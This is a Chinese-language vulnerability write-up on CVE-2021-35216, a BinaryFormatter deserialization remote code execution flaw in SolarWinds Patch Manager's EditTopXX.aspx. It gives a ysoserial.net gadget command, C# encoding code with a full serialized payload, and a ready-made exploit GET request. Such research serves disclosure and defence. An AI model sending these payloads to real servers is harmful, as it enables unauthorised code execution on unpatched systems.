CVE-2021-35216 SolarWinds PM EditTopXX.aspx RCE

Y4er 收录于类别代码审计和系列 SolarWinds

2021-10-23 2021-10-23 约 505 字预计阅读 2 分钟

系列 - SolarWinds

警告

本文最后更新于 2021-10-23，文中内容可能已过时。

# 分析

同样是使用了Serializer.Deserialize<T>(string serializedObject)

漏洞位于 SolarWinds\Orion\PM\Controls\EditResourceControls\EditTopXX.aspx.cs

同样调用 binaryformatter

ysoserial.net生成payload可以直接打，需要注意只能用get请求发包，所以要用最小的payload。

1
ysoserial.exe -f binaryformatter -g  RolePrincipal --minify -c "ping localhost -t"

然后编码

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
using System;
using System.IO;
using System.Runtime.Serialization.Formatters.Binary;
using System.Text;
using System.Web;
using System.Web.Mvc;

namespace WebApplication1.Controllers
{
    public class HomeController : Controller
    {
        public ActionResult Index()
        {
            var payload = HttpServerUtility.UrlTokenEncode(Encoding.UTF8.GetBytes(
                "AAEAAAD/////AQAAAAAAAAAMAgAAAEpTeXN0ZW0uV2ViLFZlcnNpb249NC4wLjAuMCxDdWx0dXJlPW5ldXRyYWwsUHVibGljS2V5VG9rZW49YjAzZjVmN2YxMWQ1MGEzYQUBAAAAIVN5c3RlbS5XZWIuU2VjdXJpdHkuUm9sZVByaW5jaXBhbAEAAAAqU3lzdGVtLlNlY3VyaXR5LkNsYWltc1ByaW5jaXBhbC5JZGVudGl0aWVzAQIAAAAGAwAAANgFQUFFQUFBRC8vLy8vQVFBQUFBQUFBQUFNQWdBQUFCdE5hV055YjNOdlpuUXVVRzkzWlhKVGFHVnNiQzVGWkdsMGIzSUZBUUFBQUVKTmFXTnliM052Wm5RdVZtbHpkV0ZzVTNSMVpHbHZMbFJsZUhRdVJtOXliV0YwZEdsdVp5NVVaWGgwUm05eWJXRjBkR2x1WjFKMWJsQnliM0JsY25ScFpYTUJBQUFBRDBadmNtVm5jbTkxYm1SQ2NuVnphQUVDQUFBQUJnTUFBQUNIQXp4UFltcGxZM1JFWVhSaFVISnZkbWxrWlhJZ1RXVjBhRzlrVG1GdFpUMGlVM1JoY25RaUlIaHRiRzV6UFNKb2RIUndPaTh2YzJOb1pXMWhjeTV0YVdOeWIzTnZablF1WTI5dEwzZHBibVo0THpJd01EWXZlR0Z0YkM5d2NtVnpaVzUwWVhScGIyNGlJSGh0Ykc1ek9tRTlJbU5zY2kxdVlXMWxjM0JoWTJVNlUzbHpkR1Z0TGtScFlXZHViM04wYVdOek8yRnpjMlZ0WW14NVBWTjVjM1JsYlNJK1BFOWlhbVZqZEVSaGRHRlFjbTkyYVdSbGNpNVBZbXBsWTNSSmJuTjBZVzVqWlQ0OFlUcFFjbTlqWlhOelBqeGhPbEJ5YjJObGMzTXVVM1JoY25SSmJtWnZQanhoT2xCeWIyTmxjM05UZEdGeWRFbHVabThnUVhKbmRXMWxiblJ6UFNJdll5QndhVzVuSUd4dlkyRnNhRzl6ZENBdGRDSWdSbWxzWlU1aGJXVTlJbU50WkNJdlBqd3ZZVHBRY205alpYTnpMbE4wWVhKMFNXNW1iejQ4TDJFNlVISnZZMlZ6Y3o0OEwwOWlhbVZqZEVSaGRHRlFjbTkyYVdSbGNpNVBZbXBsWTNSSmJuTjBZVzVqWlQ0OEwwOWlhbVZqZEVSaGRHRlFjbTkyYVdSbGNqNEwL"));
            Response.Write(payload);
            return View();
        }
    }

    public class Serializer
    {
        // Token: 0x06000295 RID: 661 RVA: 0x0000B64C File Offset: 0x0000984C
        public static string Serialize(object parameters)
        {
            string result;
            using (MemoryStream memoryStream = new MemoryStream())
            {
                new BinaryFormatter().Serialize(memoryStream, parameters);
                result = Base64Helper.Base64Encode(memoryStream.ToArray());
            }

            return result;
        }

        // Token: 0x06000295 RID: 661 RVA: 0x0000B7E8 File Offset: 0x000099E8
        public static T Deserialize<T>(string serializedObject)
        {
            T result;
            using (Stream stream = new MemoryStream(Base64Helper.Base64Decode(serializedObject)))
            {
                result = (T) ((object) new BinaryFormatter().Deserialize(stream));
            }

            return result;
        }
    }

    internal class Base64Helper
    {
        // Token: 0x060002AC RID: 684 RVA: 0x0000C819 File Offset: 0x0000AA19
        public static string Base64Encode(byte[] str)
        {
            return HttpServerUtility.UrlTokenEncode(Encoding.UTF8.GetBytes(Convert.ToBase64String(str)));
        }

        // Token: 0x060002AD RID: 685 RVA: 0x0000C830 File Offset: 0x0000AA30
        public static byte[] Base64Decode(string str)
        {
            byte[] bytes = HttpServerUtility.UrlTokenDecode(str);
            return Convert.FromBase64String(Encoding.UTF8.GetString(bytes));
        }
    }
}

构造请求如下

1
http://192.168.137.130:8787/Orion/PM/Controls/EditResourceControls/EditTopXX.aspx?ThwackData=QUFFQUFBRC8vLy8vQVFBQUFBQUFBQUFNQWdBQUFFcFRlWE4wWlcwdVYyVmlMRlpsY25OcGIyNDlOQzR3TGpBdU1DeERkV3gwZFhKbFBXNWxkWFJ5WVd3c1VIVmliR2xqUzJWNVZHOXJaVzQ5WWpBelpqVm1OMll4TVdRMU1HRXpZUVVCQUFBQUlWTjVjM1JsYlM1WFpXSXVVMlZqZFhKcGRIa3VVbTlzWlZCeWFXNWphWEJoYkFFQUFBQXFVM2x6ZEdWdExsTmxZM1Z5YVhSNUxrTnNZV2x0YzFCeWFXNWphWEJoYkM1SlpHVnVkR2wwYVdWekFRSUFBQUFHQXdBQUFOZ0ZRVUZGUVVGQlJDOHZMeTh2UVZGQlFVRkJRVUZCUVVGTlFXZEJRVUZDZEU1aFYwNTVZak5PZGxwdVVYVlZSemt6V2xoS1ZHRkhWbk5pUXpWR1drZHNNR0l6U1VaQlVVRkJRVVZLVG1GWFRubGlNMDUyV201UmRWWnRiSHBrVjBaelZUTlNNVnBIYkhaTWJGSnNaVWhSZFZKdE9YbGlWMFl3WkVkc2RWcDVOVlZhV0dnd1VtMDVlV0pYUmpCa1IyeDFXakZLTVdKc1FubGlNMEpzWTI1U2NGcFlUVUpCUVVGQlJEQmFkbU50Vm01amJUa3hZbTFTUTJOdVZucGhRVVZEUVVGQlFVSm5UVUZCUVVOSVFYcDRVRmx0Y0d4Wk0xSkZXVmhTYUZWSVNuWmtiV3hyV2xoSloxUlhWakJoUnpsclZHMUdkRnBVTUdsVk0xSm9ZMjVSYVVsSWFIUmlSelY2VUZOS2IyUklVbmRQYVRoMll6Sk9iMXBYTVdoamVUVjBZVmRPZVdJelRuWmFibEYxV1RJNWRFd3paSEJpYlZvMFRIcEpkMDFFV1habFIwWjBZa001ZDJOdFZucGFWelV3V1ZoU2NHSXlOR2xKU0doMFlrYzFlazl0UlRsSmJVNXpZMmt4ZFZsWE1XeGpNMEpvV1RKVk5sVXpiSHBrUjFaMFRHdFNjRmxYWkhWaU0wNHdZVmRPZWs4eVJucGpNbFowV1cxNE5WQldUalZqTTFKc1lsTkpLMUJGT1dsaGJWWnFaRVZTYUdSSFJsRmpiVGt5WVZkU2JHTnBOVkJaYlhCc1dUTlNTbUp1VGpCWlZ6VnFXbFEwT0ZsVWNGRmpiVGxxV2xoT2VsQnFlR2hQYkVKNVlqSk9iR016VFhWVk0xSm9ZMjVTU21KdFduWlFhbmhvVDJ4Q2VXSXlUbXhqTTA1VVpFZEdlV1JGYkhWYWJUaG5VVmhLYm1SWE1XeGlibEo2VUZOSmRsbDVRbmRoVnpWdVNVZDRkbGt5Um5OaFJ6bDZaRU5CZEdSRFNXZFNiV3h6V2xVMWFHSlhWVGxKYlU1MFdrTkpkbEJxZDNaWlZIQlJZMjA1YWxwWVRucE1iRTR3V1ZoS01GTlhOVzFpZWpRNFRESkZObFZJU25aWk1sWjZZM28wT0V3d09XbGhiVlpxWkVWU2FHUkhSbEZqYlRreVlWZFNiR05wTlZCWmJYQnNXVE5TU21KdVRqQlpWelZxV2xRME9Fd3dPV2xoYlZacVpFVlNhR1JIUmxGamJUa3lZVmRTYkdOcU5Fd0w1

RCE